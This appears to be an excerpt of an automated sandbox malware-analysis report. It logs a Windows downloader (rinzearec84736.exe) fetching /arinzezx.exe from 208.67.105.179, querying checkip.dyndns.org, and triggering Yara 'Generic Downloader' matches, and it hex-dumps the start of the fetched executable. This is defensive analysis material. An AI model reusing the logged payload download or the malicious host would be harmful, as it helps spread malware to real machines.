Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171

Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 193.122.6.168:80

Networking

May check the online IP address of the machine

Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	DNS query: name: checkip.dyndns.org

Yara detected Generic Downloader

Source: Yara match	File source: 6.0.rinzearec84736.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rinzearec84736.exe.33d8c18.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rinzearec84736.exe.33b8bf8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rinzearec84736.exe.33745d8.10.raw.unpack, type: UNPACKEDPE

Source: Joe Sandbox View

IP Address: 193.122.6.168 193.122.6.168

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 29 Nov 2022 15:50:19 GMTServer: ApacheLast-Modified: Tue, 29 Nov 2022 07:44:35 GMTETag: "cda00-5ee9728c85e41"Accept-Ranges: bytesContent-Length: 842240Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 2d b6 85 63 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 d2 0c 00 00 06 00 00 00 00 00 00 e2 f0 0c 00 00 20 00 00 00 00 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 90 f0 0c 00 4f 00 00 00 00 00 0d 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e8 d0 0c 00 00 20 00 00 00 d2 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 88 03 00 00 00 00 0d 00 00 04 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0d 00 00 02 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c4 f0 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 3c e5 00 00 fc 8f 00 00 03 00 00 00 6c 00 00 06 38 75 01 00 58 7b 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5e 02 14 7d 01 00 00 04 02 28 14 00 00 0a 00 00 02 28 07 00 00 06 00 2a 13 30 01 00 16 00 00 00 01 00 00 11 00 73 14 00 00 06 0a 06 6f 15 00 00 0a 00 02 28 16 00 00 0a 00 2a 00 00 13 30 01 00 16 00 00 00 02 00 00 11 00 73 0f 00 00 06 0a 06 6f 15 00 00 0a 00 02 28 16 00 00 0a 00 2a 00 00 13 30 01 00 16 00 00 00 03 00 00 11 00 73 08 00 00 06 0a 06 6f 15 00 00 0a 00 02 28 16 00 00 0a 00 2a 00 00 13 30 01 00 16 00 00 00 04 00 00 11 00 73 1a 00 00 06 0a 06 6f 15 00 00 0a 00 02 28 16 00 00 0a 00 2a 00 00 13 30 02 00 2b 00 00 00 05 00 00 11 00 03 2c 0b 02 7b 01 00 00 04 14 fe 03 2b 01 16 0a 06 2c 0e 00 02 7b 01 00 00 04 6f 17 00 00 0a 00 00 02 03 28 18 00 00 0a 00 2a 00 13 30 06 00 72 04 00 00 06 00 00 11 00 d0 02 00 00 02 28 19 00 00 0a 73 1a 00 00 0a 0a 02 73 1b 00 00 0a 7d 02 00 00 04 02 73 1b 00 00 0a 7d 03 00 00 04 02 73 1b 00 00 0a 7d 04 00 00 04 02 73 1b 00 00 0a 7d 05 00 00 04 02 28 1c 00 00 0a 00 02 7b 02 00 00

Source: global traffic	HTTP traffic detected: GET /arinzezx.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 208.67.105.179Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.105.179
